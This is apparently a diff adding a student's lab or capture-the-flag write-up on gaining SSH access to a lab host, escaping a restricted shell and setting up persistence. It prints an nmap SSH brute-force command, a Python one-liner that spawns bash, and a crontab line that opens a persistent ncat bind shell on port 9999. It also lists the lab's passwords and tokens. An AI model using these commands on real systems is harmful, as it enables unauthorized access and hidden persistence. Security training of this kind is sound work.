|
| 1 | +# 6: Privilege Escalation and Persistence |
| 2 | + |
| 3 | +The task is simple: Get SSH access to moriarty@192.168.1.193 and find flag. |
| 4 | +We are given a hint: Despite being a criminal mastermind, |
| 5 | +this person loves reading superhero comic books….. nerd! |
| 6 | + |
| 7 | +So first we tried to bruteforce the password for user moriarty using the list |
| 8 | +of 1000 most common passwords (https://raw.githubusercontent.com/DavidWittman/wpxmlrpcbrute/master/wordlists/1000-most-common-passwords.txt) |
| 9 | +and command: |
| 10 | + |
| 11 | +``` |
| 12 | +sudo nmap -sS -sV -p 22 192.168.1.193 -v -n --script ssh-brute --script-args userdb=names.txt,passdb=1000-most-common-passwords.txt |
| 13 | +``` |
| 14 | + |
| 15 | +This sadly failed and didn't find the correct password. |
| 16 | +So we tried to guess what the password might be and on the first try we get in; |
| 17 | +the password was 'batman'. |
| 18 | + |
| 19 | +After getting in we see, that we have only 2 command available, python and ls. |
| 20 | +Using python we are able to spawn a shell: |
| 21 | + |
| 22 | +``` |
| 23 | +import os; print(os.system('/bin/bash')) |
| 24 | +``` |
| 25 | + |
| 26 | +After that, we could roam freely all over the server. |
| 27 | +First thing we did was to have some persistence we added following line to crontab: |
| 28 | + |
| 29 | +``` |
| 30 | +(crontab -l ; echo "@reboot sleep 200 && ncat -l 9999 -k -c /bin/bash")|crontab 2> /dev/null |
| 31 | +``` |
| 32 | + |
| 33 | +Which will upon reboot spawn a shell acessible on port 9999. |
| 34 | + |
| 35 | +After that, we explore more of what we can do. After a few minutes we stumble upon |
| 36 | +folder assignment07 under /home/user which contains script for the 7th assignment. |
| 37 | +In file password_rotator.sh we find whole script for the assignment from which we draw following conclusions: |
| 38 | + |
| 39 | +1. The passwords that the user rotates are: "superman" "ironman" "batman" "4a7#mgannn2LDD90T#1fX#0Yx%m!kxrMSmUXd60xKwdM0S6u" |
| 40 | + |
| 41 | +2. The file with second token is: /var/tmp/tokens/second_token.txt and it's content |
| 42 | +changes to following values: "Hysterical" "Spaghetti" "Floss" "Apparently" |
| 43 | +which together give the token for second part of the assignment: HystericalSpaghettiFlossApparently |
| 44 | +This token is also in the first comment in the script |
| 45 | +``` |
| 46 | +#TOKEN:HystericalSpaghettiFlossApparently |
| 47 | +``` |
| 48 | + |
| 49 | +3. The flag server for second part of the assignment is 192.168.1.167:9453 |
| 50 | + |
| 51 | +4. On password rotation all ssh session to moriarty are killed so we won't be able |
| 52 | +to persist our ssh connection but we can definitely spawn a remote shell which shouldn't |
| 53 | +get killed by the script. |
| 54 | + |
| 55 | +After looking into the /vat/tmp/tokens folder we find token and flag server for first part |
| 56 | +of the task as well. We try to submit both flags but flag for token for the part B doesn't |
| 57 | +work which we later get to know was unintentional. |
0 commit comments